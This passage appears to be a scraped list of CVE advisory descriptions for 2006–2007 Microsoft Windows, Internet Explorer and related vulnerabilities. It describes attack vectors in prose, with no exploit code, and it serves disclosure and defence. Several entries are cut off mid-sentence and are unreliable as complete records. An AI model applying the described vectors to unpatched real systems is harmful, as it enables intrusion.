Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2730] Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2229] Microsoft Windows Vista uses insecure default permissions for unspecified "local user information data stores" in the registry and the file system, which allows local users to obtain sensitive information such as administrative passwords, aka "Permissive User Information Store ACLs Information Disclosure Vulnerability." [CVE-2007-2228] rpcrt4.dll (aka the RPC runtime library) in Microsoft Windows XP SP2, XP Professional x64 Edition, Server 2003 SP1 and SP2, Server 2003 x64 Edition and x64 Edition SP2, and Vista and Vista x64 Edition allows remote attackers to cause a denial of service (RPCSS service stop and system restart) via an RPC request that uses NTLMSSP PACKET authentication with a zero-valued verification trailer signature, which triggers an invalid dereference. NOTE: this also affects Windows 2000 SP4, although the impact is an information leak. [CVE-2007-2227] The MHTML protocol handler in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle Content-Disposition "notifications," which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "Content Disposition Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2225] A component in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle certain HTTP headers when processing MHTML protocol URLs, which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "URL Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1973] Race condition in the Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 allows local users to modify memory and gain privileges via the temporary \Device\PhysicalMemory section handle, a related issue to CVE-2007-1206. [CVE-2007-1946] Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp. [CVE-2007-1912] Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1763] The ATI kernel driver (atikmdag.sys) in Microsoft Windows Vista allows user-assisted remote attackers to cause a denial of service (crash) via a crafted JPG image, as demonstrated by a slideshow, possibly due to a buffer overflow. [CVE-2007-1748] Stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to execute arbitrary code via a long zone name containing character constants represented by escape sequences. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1658] Windows Mail in Microsoft Windows Vista might allow user-assisted remote attackers to execute certain programs via a link to a (1) local file or (2) UNC share pathname in which there is a directory with the same base name as an executable program at the same level, as demonstrated using C:/windows/system32/winrm (winrm.cmd) and migwiz (migwiz.exe). [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1535] Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-1533] The Teredo implementation in Microsoft Windows Vista uses the same nonce for communication with different UDP ports within a solicitation session, which makes it easier for remote attackers to spoof the nonce through brute force attacks. [CVE-2007-1532] The neighbor discovery implementation in Microsoft Windows Vista allows remote attackers to conduct a redirect attack by (1) responding to queries by sending spoofed Neighbor Advertisements or (2) blindly sending Neighbor Advertisements. [CVE-2007-1531] Microsoft Windows XP and Vista overwrites ARP table entries included in gratuitous ARP, which allows remote attackers to cause a denial of service (loss of network access) by sending a gratuitous ARP for the address of the Vista host. [CVE-2007-1530] The LLTD Mapper in Microsoft Windows Vista does not properly gather responses to EMIT packets, which allows remote attackers to cause a denial of service (mapping failure) by omitting an ACK response, which triggers an XML syntax error. [CVE-2007-1529] The LLTD Responder in Microsoft Windows Vista does not send the Mapper a response to a DISCOVERY packet if another host has sent a spoofed response first, which allows remote attackers to spoof arbitrary hosts via a network-based race condition, aka the "Total Spoof" attack. [CVE-2007-1528] The LLTD Mapper in Microsoft Windows Vista allows remote attackers to spoof hosts, and nonexistent bridge relationships, into the network topology map by using a MAC address that differs from the MAC address provided in the Real Source field of the LLTD BASE header of a HELLO packet, aka the "Spoof on Bridge" attack. [CVE-2007-1527] The LLTD Mapper in Microsoft Windows Vista does not verify that an IP address in a TLV type 0x07 field in a HELLO packet corresponds to a valid IP address for the local network, which allows remote attackers to trick users into communicating with an external host by sending a HELLO packet with the MW characteristic and a spoofed TLV type 0x07 field, aka the "Spoof and Management URL IP Redirect" attack. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1499] Microsoft Internet Explorer 7.0 on Windows XP and Vista allows remote attackers to conduct phishing attacks and possibly execute arbitrary code via a res: URI to navcancl.htm with an arbitrary URL as an argument, which displays the URL in the location bar of the "Navigation Canceled" page and injects the script into the "Refresh the page" link, aka Navigation Cancel Page Spoofing Vulnerability." [CVE-2007-1492] winmm.dll in Microsoft Windows XP allows user-assisted remote attackers to cause a denial of service (infinite loop) via a large cch argument value to the mmioRead function, as demonstrated by a crafted WAV file. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1209] Use-after-free vulnerability in the Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Vista does not properly handle connection resources when starting and stopping processes, which allows local users to gain privileges by opening and closing multiple ApiPort connections, which leaves a "dangling pointer" to a process data structure. [CVE-2007-1206] The Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1204] Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in Microsoft Windows XP SP2 allows remote attackers on the same subnet to execute arbitrary code via crafted HTTP headers in request or notification messages, which trigger memory corruption. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0878] Unspecified vulnerability in Microsoft Internet Explorer on Windows Mobile 5.0 allows remote attackers to cause a denial of service (loss of browser and other device functionality) via a malformed WML page, related to an "overflow state." NOTE: it is possible that this issue is related to CVE-2007-0685. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0562] Windows Explorer (explorer.exe) 6.0.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .avi file, which triggers the crash when the user right clicks on the file. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0210] The Window Image Acquisition (WIA) Service in Microsoft Windows XP SP2 allows local users to gain privileges via unspecified vectors involving an "unchecked buffer," probably a buffer overflow. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0045] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0, and possibly the plugin distributed with Adobe Reader 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2, for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Google Chrome, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS)." [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7206] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating a ADODB.Recordset object and making a series of calls to the NextRecordset method with a long string argument, which causes an "invalid memory access" in the SysFreeString function, a different issue than CVE-2006-3510 and CVE-2006-3899. [CVE-2006-7066] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2006-6902] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows Mobile Pocket PC edition allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6901] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6797] The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696. [CVE-2006-6753] Event Viewer (eventvwr.exe) in Microsoft Windows does not properly display log data that contains '%' (percent) characters, which might make it impossible to use Event Viewer to determine the actual data that triggered an event, and might produce long strings that are not properly handled by certain processes that rely on Event Viewer. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6659] The Microsoft Office Outlook Recipient ActiveX control (ole32.dll) in Windows XP SP2 allows remote attackers to cause a denial of service (Internet Explorer 7 hang) via crafted HTML. [CVE-2006-6602] explorer.exe in Windows Explorer 6.00.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a crafted WMV file. [CVE-2006-6601] Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0. [CVE-2006-6579] Microsoft Windows XP has weak permissions (FILE_WRITE_DATA and FILE_READ_DATA for Everyone) for %WINDIR%\pchealth\ERRORREP\QHEADLES, which allows local users to write and read files in this folder, as demonstrated by an ASP shell that has write access by IWAM_machine and read access by IUSR_Machine. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. [CVE-2006-6252] Microsoft Windows Live Messenger 8.0 and earlier, when gestual emoticons are enabled, allows remote attackers to cause a denial of service (CPU consumption) via a long string composed of ":D" sequences, which are interpreted as emoticons. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5745] Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. [CVE-2006-5614] Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5448] The drmstor.dll ActiveX object in Microsoft Windows Digital Rights Management System (DRM) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long parameter to the StoreLicense function, which triggers "memory corruption" and possibly a buffer overflow. [CVE-2006-5270] Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file. [CVE-2006-5028] Directory traversal vulnerability in filemanager/filemanager.php in SWsoft Plesk 7.5 Reload and Plesk 7.6 for Microsoft Windows allows remote attackers to list arbitrary directories via a ../ (dot dot slash) in the file parameter in a chdir action. [CVE-2006-4868] Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4138] Multiple unspecified vulnerabilities in Microsoft Windows Help File viewer (winhlp32.exe) allow user-assisted attackers to execute arbitrary code via crafted HLP files. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, 